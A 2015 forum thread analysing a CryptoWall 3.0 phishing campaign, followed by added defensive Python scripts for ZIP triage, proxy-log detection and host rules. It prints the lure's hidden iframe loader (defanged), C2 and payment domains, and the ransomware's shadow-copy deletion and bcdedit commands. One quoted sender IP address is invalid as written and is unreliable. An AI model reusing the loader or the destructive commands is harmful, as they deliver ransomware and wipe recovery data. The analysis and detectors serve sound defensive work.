CryptoWall 3.0 - New, Interesting Phishing Campaign In-the-Wild



#1 White Hat Mike

Posted 05 June 2015 - 12:30 AM

My primary article on my own self-owned site: https://www.emergingthreats.info/v3/article.php?id=4

 

Just a reminder to all -- CryptoWall 3.0 is still very much active, with phish tactics that I think are less effective, but who knows; maybe they're seeing great success with this method. Personally, if successful compromise requires additional steps/execution of more than one file that's distributed as an e-mail attachment, I would imagine that the success rate would decline. But who knows; perhaps the opening of the attached, compressed HTML file resulting in no nefarious activity initially is being used as a method of gaining the trust of the targeted user...

 


CryptoWall 3.0 Still Actively Being Spread as a New Campaign is Discovered in-the-wild

 
The New Campaign Relies on Phishing
 
A new campaign spreading CryptoWall 3.0 has been observed in-the-wild, and reported to the administrator of http://malware-traffic-analysis.net who shared several screenshots as well as network traffic logs captured upon execution of the malicious binary.
 
This campaign is a bit different from others, as it involves two (2) stages of user intervention; the user must execute the initial file attached to the e-mail within a ZIP archive, but then must execute the additional file--a binary file masked as an SCR to appear to be a legitimate Adobe Reader PDF document--which contains the CryptoWall 3.0 payload.
 
The phishing e-mails are being sent claiming to contain resumes. An example phish shared on malware-traffic-analysis is below:
 

[Screenshot: example CryptoWall 3.0 resume malspam e-mail, 2015-06-04, from malware-traffic-analysis.net]

 
The e-mails appear to be sourced from Yahoo e-mail addresses; a large quantity of these phishing e-mails were logged by the reporting user as being sourced from different Yahoo addresses. Headers observed within one of the e-mails reveal a sender e-mail address of:
 

jamisonpearlberg@yahoo.com
 
With a source IP address (X-Originating-IP) of 98.1136.216.211.  The attachment, in this case, was named:
 

my_resume.zip
 
Containing a single HTML file named resume3606.html.  The HTML file is quite small, as its sole intention can be described best by the below screenshot of its source code:
 

[Screenshot: source code of resume3606.html]

 
The HTML file contains an iframe that calls to what appears to be a compromised domain, now used as a C2 (command-and-control) server by the malware author.  The below URL called by the iframe has been filtered for user safety; this was still distributing the SCR file a few hours ago.
 

<iframe src="hxxp://coppolarestaurant.com/cgi/resume2.php?id=661" width="418" height="792" style="position:absolute;left:-10450px;"></iframe>
 
Upon opening the HTML document, this iframe opens the above URL, which then prompts the download of an SCR file containing the CryptoWall 3.0 payload, masked to appear to the victim as a legitimate Adobe PDF document.
 
The attacker has modified the PE header of the file so that the SCR file's icon is that of an Adobe Reader PDF document:
 

[Screenshot: the SCR file displayed with an Adobe Reader PDF icon]

 
The sample SCR file examined from the above URL was named my_resume_pdf_id_6721-3921-5311.scr.
 
Upon execution, this file launches the CryptoWall 3.0 payload that we all know and despise.
 
We have already seen CryptoWall 3.0 and analyzed it plenty of times, but this was one of the few times I actually got the sample to run cleanly in a sandbox, so I added some analysis results below, primarily to share new(er) C2 servers, new gateways (if any) utilized, etc.
 
Brief Analysis
 
Static Analysis
 
File Size: 272 KB (278,528 Bytes)
File Type: PE32 Executable (GUI)
Detection Ratio as of 06/04/2015: 4/57
Currently Detected by (as of 06/04/2015):
ESET-NOD32
Kaspersky
McAfee-GW-Edition
Qihoo-360
 
Dynamic Analysis
 
DNS Requests

ip-addr.es -> 188.165.164.184 // To get victim's external IP
pinoyjokes.org -> 174.37.160.8 // compromised site, C2 server
gdsprint.com -> 194.28.86.134 // compromised site, C2 server
 
HTTP Requests
 
Performs various POST requests; one to ip-addr.es to obtain the victim's external, public-facing IP address, and others to various C2 servers. The structure of these POST requests is the same or very similar (i.e. a different one-letter variable in the request), but to different C2 servers:
 
Example request:
 

http://<c2-server-domain>/img3.php?b=puo8cmg8gx51t9
 
Example response to above:
 

x=d208506460e4fc1b86f4c88cea33d68c3a4578b5eecc0db1a8c4f68c1c8446ab3d5ff799d7aa01efc6091dfabea00392eacdd9b8e5c01157828c1c67c4efd0
 
Example request:
 

http://<c2-server-domain>/img3.php?o=7jxdqunpkp
 
Etcetera...  
 
C2 Servers

coppolarestaurant.com -> 64.136.20.51
pinoyjokes.com -> 23.23.174.132
gdsprint.com -> 194.28.86.134
herp.net -> 173.254.28.111
canbroc-bg.com -> 91.215.216.13
japaneselink.net -> 157.112.152.48
 
Payment Gateways
 
Sample Subdomain: 7oqnsnzwwnm6zb7q
 

<subdomain>.optionpaymentprak.com/k1t7k6
<subdomain>.paygateawayoros.com/k1t7k6
<subdomain>.paymentgateposa.com/k1t7k6
<subdomain>.watchdogpayment.com/k1t7k6
 
Associated Files

%LocalAppData%\<sample_name>
C:\myapp.exe
 
Injects code into explorer.exe.
 
Associated Registry Entries

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run ecf7edf (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *cf7edf (logged four times)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run 687ddeba (logged twice)
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\RunOnce *87ddeba (logged four times)
 
Creates Start Menu Entry (Example)

C:\Users\<profile>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2429bdf.exe
 
Creates Files Inside User Directory (Example)

C:\Users\<profile>\AppData\Roaming\a3a659b7.exe
 
Mutexes

CryptoWall3 // * note this was the name I saved and analyzed sample as
qazwsxedc
 
Associated Domains Used for Obtaining External, Public-Facing IP Address
 

curlmyip.com
ip-addr.es
myexternalip.com/raw
 
Spawned Processes; Process Tree
 

C:\sample.exe
  C:\sample.exe
    C:\Windows\explorer.exe
      C:\Windows\System32\svchost.exe -k netsvcs
      C:\Windows\System32\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled No
      C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
 
Virtual Machine / Analysis Evasion
- Queries a list of all running processes
- Checks the available/free space of all local hard drives
 
Searches for the following files within the local file system (assumed; these strings were found in memory):

VBoxService.exe
vmtoolsd.exe
 
Treat this as a CryptoWall 3.0 refresher, and remember: keep your system updated, and don't open e-mails, especially not e-mail attachments, from unknown senders. Even if the e-mail appears to be from someone you know--even if the e-mail address displayed as the sender is that of someone you know--if something looks suspicious, it's always best to trust your intuition. Better safe than sorry. Stay safe!
 

Edited by White Hat Mike, 05 June 2015 - 02:02 AM.

Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com
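As an added example (not part of the original post, and not the author's own tooling), the following Python script triages a ZIP attachment of the kind described in the post above: it lists the archive members, parses any HTML member for iframes that are pushed off-screen or point at a remote host, and flags members that carry an executable extension or a PE (MZ) header behind a PDF-looking name. The ZIP and its members are constructed in memory; the iframe URL uses a placeholder host rather than the live domain from the post, and the .scr member is a two-byte MZ stub, not a real sample.

```python
"""Added example: offline triage of a ZIP e-mail attachment for the two-stage
lure described in the post (hidden-iframe HTML, then a PDF-looking .scr).

The ZIP, its HTML member and the MZ stub below are constructed in memory;
the iframe URL uses a placeholder host, not the live domain from the post.
"""
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed lure: same shape as the iframe quoted in the post, placeholder host.
LURE_HTML = (
    '<html><body><iframe src="http://lure.example/cgi/resume2.php?id=661" '
    'width="418" height="792" style="position:absolute;left:-10450px;">'
    '</iframe></body></html>'
)

EXECUTABLE_EXTS = {".scr", ".exe", ".pif", ".com", ".cpl", ".js", ".jse", ".vbs", ".hta"}
# CSS tricks that keep a frame out of the user's sight: negative offsets, display:none, hidden.
HIDING_CSS = re.compile(r"(left|top)\s*:\s*-\d+|display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeFinder(HTMLParser):
    """Collect every <iframe> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def suspicious_iframes(html_text):
    """Return [(src, [reasons])] for iframes that look like hidden loaders."""
    finder = IframeFinder()
    finder.feed(html_text)
    findings = []
    for f in finder.iframes:
        reasons = []
        src = f.get("src", "")
        if urlparse(src).scheme in ("http", "https"):
            reasons.append("remote src")
        if HIDING_CSS.search(f.get("style", "")):
            reasons.append("positioned off-screen or hidden")
        w, h = f.get("width", ""), f.get("height", "")
        if w.isdigit() and h.isdigit() and int(w) * int(h) < 100:
            reasons.append("near-zero size")
        if reasons:
            findings.append((src, reasons))
    return findings


def triage_zip(zip_bytes):
    """Inspect each ZIP member; returns {member_name: [notes]} (empty list = nothing flagged)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            data = zf.read(name)
            notes = []
            if ext in EXECUTABLE_EXTS:
                notes.append("executable extension " + ext)
            if data[:2] == b"MZ":
                notes.append("PE (MZ) header, whatever the extension says")
            if "pdf" in name.lower() and ext != ".pdf":
                notes.append("name suggests PDF but extension is " + ext)
            if ext in (".html", ".htm"):
                for src, reasons in suspicious_iframes(data.decode("utf-8", "replace")):
                    notes.append("iframe %s: %s" % (src, ", ".join(reasons)))
            report[name] = notes
    return report


def build_sample_zip():
    """Constructed my_resume.zip: the lure HTML plus an MZ stub named like the post's SCR."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("resume3606.html", LURE_HTML)
        # Two magic bytes and padding stand in for a PE; this is not a malware sample.
        zf.writestr("my_resume_pdf_id_6721-3921-5311.scr", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for member, notes in triage_zip(build_sample_zip()).items():
        print(member, "->", "; ".join(notes) or "nothing flagged")
```

The point of checking the MZ header independently of the extension is that the lure relies on the extension and icon being what the user looks at; a mail gateway that only blocks by extension list misses a renamed PE, and one that only looks at magic bytes misses the HTML stage entirely.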

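Added example, not from the original post: a detector for the network sequence recorded under Dynamic Analysis, run over constructed proxy-log lines in a simple "epoch client-ip method url status" layout (the log format is an assumption for this example). It flags a public-IP lookup followed within a window by the /img3.php?<letter>=<token> check-in to a compromised site, and any contact with a 16-character base32 subdomain of a payment-gateway domain. The hostnames are taken from the post's indicator lists; the client addresses and timestamps are made up.

```python
"""Added example: detect the CryptoWall 3.0 network sequence from the post in
proxy logs.  Log format assumed here: "<epoch> <client-ip> <method> <url> <status>".
All lines in SAMPLE_LOG are constructed; the hostnames come from the post's
indicator lists, the client addresses and timestamps do not."""
import re
from collections import defaultdict
from urllib.parse import urlparse

IP_LOOKUP_HOSTS = {"ip-addr.es", "curlmyip.com", "myexternalip.com"}
# /img3.php?b=puo8cmg8gx51t9 and /img3.php?o=7jxdqunpkp in the post: a one-letter
# parameter carrying a short lowercase alphanumeric token, and nothing else.
C2_URI = re.compile(r"^/img\d*\.php\?[a-z]=[a-z0-9]{8,24}$")
# 7oqnsnzwwnm6zb7q.<gateway>.com: a 16-char base32 label, the shape of a Tor hidden-service name.
GATEWAY_HOST = re.compile(r"^[a-z2-7]{16}\.[a-z0-9-]+\.(com|net|org)$")
LINE = re.compile(r"^(?P<ts>\d+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")

SAMPLE_LOG = """\
1433400000 10.0.0.7 POST http://ip-addr.es/ 200
1433400003 10.0.0.7 POST http://pinoyjokes.org/img3.php?b=puo8cmg8gx51t9 200
1433400004 10.0.0.7 POST http://gdsprint.com/img3.php?o=7jxdqunpkp 200
1433400090 10.0.0.7 GET http://7oqnsnzwwnm6zb7q.optionpaymentprak.com/k1t7k6 200
1433400500 10.0.0.9 GET http://myexternalip.com/raw 200
1433400600 10.0.0.9 GET http://www.example.com/news/index.html 200
1433401000 10.0.0.11 GET http://cdn.example.net/img.php?x=somegallerytoken 200
this line is not a log entry and is skipped
"""


def parse(line):
    """Split one log line into ts/src/host/path, or None if it does not fit the format."""
    m = LINE.match(line)
    if not m:
        return None
    u = urlparse(m["url"])
    path = u.path + ("?" + u.query if u.query else "")
    return {"ts": int(m["ts"]), "src": m["src"], "host": (u.hostname or "").lower(), "path": path}


def classify(ev):
    """Tag an event as ip_lookup, c2_checkin, payment_gateway, or None."""
    if ev["host"] in IP_LOOKUP_HOSTS:
        return "ip_lookup"
    if C2_URI.match(ev["path"]):
        return "c2_checkin"
    if GATEWAY_HOST.match(ev["host"]):
        return "payment_gateway"
    return None


def detect(lines, window=600):
    """Return [(client, severity, detail)].  A C2-shaped URI alone is medium; the same
    client doing an IP lookup first (the order the sandbox showed) raises it to high."""
    by_src = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev:
            tag = classify(ev)
            if tag:
                by_src[ev["src"]].append((ev["ts"], tag, ev["host"]))
    alerts = []
    for src, evs in by_src.items():
        evs.sort()
        lookups = [ts for ts, tag, _ in evs if tag == "ip_lookup"]
        c2 = [(ts, host) for ts, tag, host in evs if tag == "c2_checkin"]
        gateways = sorted({host for _, tag, host in evs if tag == "payment_gateway"})
        chained = sorted({h for ts, h in c2 if any(0 <= ts - t <= window for t in lookups)})
        if chained:
            alerts.append((src, "high", "IP lookup followed by C2 check-in to " + ", ".join(chained)))
        elif c2:
            alerts.append((src, "medium", "C2-style URI without a preceding IP lookup"))
        if gateways:
            alerts.append((src, "high", "payment gateway contact: " + ", ".join(gateways)))
    return alerts


if __name__ == "__main__":
    for src, sev, detail in detect(SAMPLE_LOG.splitlines()):
        print(src, sev, detail)
```

The IP-lookup-then-check-in ordering is what makes the rule usable on a busy proxy: img.php?x=... style URIs exist on legitimate sites (the 10.0.0.11 line is there to show the lower-severity path), while a client that asks "what is my public IP" and within minutes posts a short token to a PHP script on an unrelated compromised domain matches the sandbox trace closely.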

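Added example, not from the original post: host-side rules for the process, registry and file behaviours listed above (shadow-copy deletion, boot-recovery tampering, Run/RunOnce values with random hex names, the Startup-folder and %AppData% drops), evaluated over constructed events modelled loosely on Sysmon event types 1, 11 and 13. The dictionary field names, SID and user profile are my own simplification and are not Sysmon's schema; a benign "vssadmin list shadows" and an ordinary OneDrive Run value are included to show the rules stay quiet on them.

```python
"""Added example: host-side rules for the behaviours listed under Dynamic Analysis.
Events are constructed dicts modelled loosely on Sysmon event types
(1 = process create, 11 = file create, 13 = registry value set); the field
names are a simplification for this example, not Sysmon's own schema."""
import re

SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows\s+/all(\s+/quiet)?", re.I)
BOOT_TAMPER = re.compile(
    r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)
# Run/RunOnce values named with 6-8 hex chars (ecf7edf, *cf7edf, 687ddeba in the post).
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\(\*?[0-9a-f]{6,8})$", re.I)
STARTUP_DROP = re.compile(r"\\Start Menu\\Programs\\Startup\\[0-9a-f]{8}\.exe$", re.I)
APPDATA_DROP = re.compile(r"\\AppData\\Roaming\\[0-9a-f]{8}\.exe$", re.I)

EVENTS = [  # constructed telemetry; the SID, user name and paths are made up
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "cmd": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "cmd": "bcdedit /set {default} recoveryenabled No"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "cmd": "bcdedit /set {default} bootstatuspolicy ignoreallfailures"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe", "cmd": "vssadmin list shadows"},  # benign admin use
    {"id": 13, "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\ecf7edf",
     "details": r"C:\Users\alice\AppData\Roaming\a3a659b7.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\*cf7edf",
     "details": r"C:\Users\alice\AppData\Roaming\a3a659b7.exe"},
    {"id": 13, "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},  # normal autostart
    {"id": 11, "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2429bdf.exe"},
]


def match_process(ev):
    hits = []
    cmd = ev.get("cmd", "")
    if SHADOW_DELETE.search(cmd):
        hits.append(("shadow_copy_deletion", "high"))
    if BOOT_TAMPER.search(cmd):
        hits.append(("boot_recovery_tamper", "high"))
    if hits and ev.get("parent", "").lower().endswith("\\explorer.exe"):
        # vssadmin/bcdedit launched straight from explorer.exe matches the injected-explorer
        # process tree in the post rather than an administrator's console session.
        hits.append(("admin_tool_spawned_by_explorer", "medium"))
    return hits


def match_registry(ev):
    hits = []
    m = RUN_KEY.search(ev.get("target", ""))
    if m:
        key, name = m.group(1), m.group(2)
        hits.append(("random_hex_run_value", "medium"))
        if key.lower() == "runonce" and name.startswith("*"):
            # A leading * on a RunOnce value makes Windows run it even in Safe Mode.
            hits.append(("runonce_safe_mode_marker", "medium"))
        if APPDATA_DROP.search(ev.get("details", "")):
            hits.append(("run_value_points_to_appdata_hex_exe", "high"))
    return hits


def match_file(ev):
    if STARTUP_DROP.search(ev.get("target", "")):
        return [("startup_folder_hex_exe", "high")]
    return []


def analyze(events):
    """Return (verdict, [(event_index, rule, severity)])."""
    handlers = {1: match_process, 13: match_registry, 11: match_file}
    findings = []
    for i, ev in enumerate(events):
        handler = handlers.get(ev.get("id"))
        for rule, sev in (handler(ev) if handler else []):
            findings.append((i, rule, sev))
    rules = {r for _, r, _ in findings}
    if {"shadow_copy_deletion", "boot_recovery_tamper"} <= rules:
        verdict = "ransomware_pre_encryption"
    else:
        verdict = "suspicious" if findings else "clean"
    return verdict, findings


if __name__ == "__main__":
    verdict, findings = analyze(EVENTS)
    print("verdict:", verdict)
    for i, rule, sev in findings:
        print(i, sev, rule)
```

Shadow-copy deletion plus boot-recovery tampering is the moment to act on: both happen before the encryption loop, so a detection that pages on this pair, and an EDR policy that blocks vssadmin Delete Shadows outright for non-admin sessions, buys the minutes that matter.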

 


#2 quietman7 (Global Moderator)

Posted 05 June 2015 - 06:09 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#3 White Hat Mike (Topic Starter)

Posted 05 June 2015 - 08:51 AM

Phishing wouldn't work as well if the majority of users were not so easily fooled/tricked.

 

Of course.  It's unfortunate that this campaign, that requires users to download and execute two separate files, appears to be quite successful...






